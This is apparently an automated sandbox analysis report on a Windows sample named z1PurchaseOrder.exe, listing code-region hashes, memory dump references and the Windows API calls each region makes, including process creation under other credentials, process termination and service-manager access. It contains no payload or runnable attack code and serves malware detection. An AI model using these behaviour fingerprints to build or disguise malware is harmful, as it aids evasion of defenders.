                                        • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                        • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                        • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                        • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                        APIs
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                        • String ID:
                                        • API String ID: 1640429340-0
                                        • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                        • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                        • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                        • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __fileno__setmode$DebugOutputString_fprintf
                                        • String ID:
                                        • API String ID: 3354276064-0
                                        • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                        • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                        • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                        • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                        • String ID:
                                        • API String ID: 752480666-0
                                        • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                        • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                        • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                        • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 0045527A
                                        • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                        • String ID:
                                        • API String ID: 3275902921-0
                                        • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                        • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                        • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                        • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                        • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                        • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                        • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                        • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                        • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                        • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                        • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                        • __calloc_crt.LIBCMT ref: 0041419B
                                        • __getptd.LIBCMT ref: 004141A8
                                        • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                        • __dosmaperr.LIBCMT ref: 00414201
                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1803633139-0
                                        • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                        • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                        • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                        • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                        APIs
                                        • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                        • String ID:
                                        • API String ID: 3275902921-0
                                        • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                        • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                        • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                        • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                        APIs
                                        • SendMessageW.USER32 ref: 004554DF
                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                        • String ID:
                                        • API String ID: 3691411573-0
                                        • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                        • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                        • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                        • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                        • String ID:
                                        • API String ID: 1814673581-0
                                        • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                        • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                        • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                        • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                        APIs
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                        • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                        • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                        • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                        APIs
                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                        • LineTo.GDI32(?,?,?), ref: 00447227
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                        • LineTo.GDI32(?,?,?), ref: 0044723D
                                        • EndPath.GDI32(?), ref: 0044724E
                                        • StrokePath.GDI32(?), ref: 0044725C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                        • String ID:
                                        • API String ID: 372113273-0
                                        • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                        • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                        • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                        • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                        • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                        • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                        • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0044CBEF
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                        • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                        • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                        • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                        APIs
                                        • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                        • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                          • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                        • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                        • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                        • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                        • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                        • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                        • CloseHandle.KERNEL32(00000000), ref: 00437174
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                        • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                        • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                        • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\z1PurchaseOrder.exe,00000004), ref: 00436055
                                        • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                        • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                        • GetLastError.KERNEL32 ref: 00436081
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                        • String ID:
                                        • API String ID: 1690418490-0
                                        • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                        • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
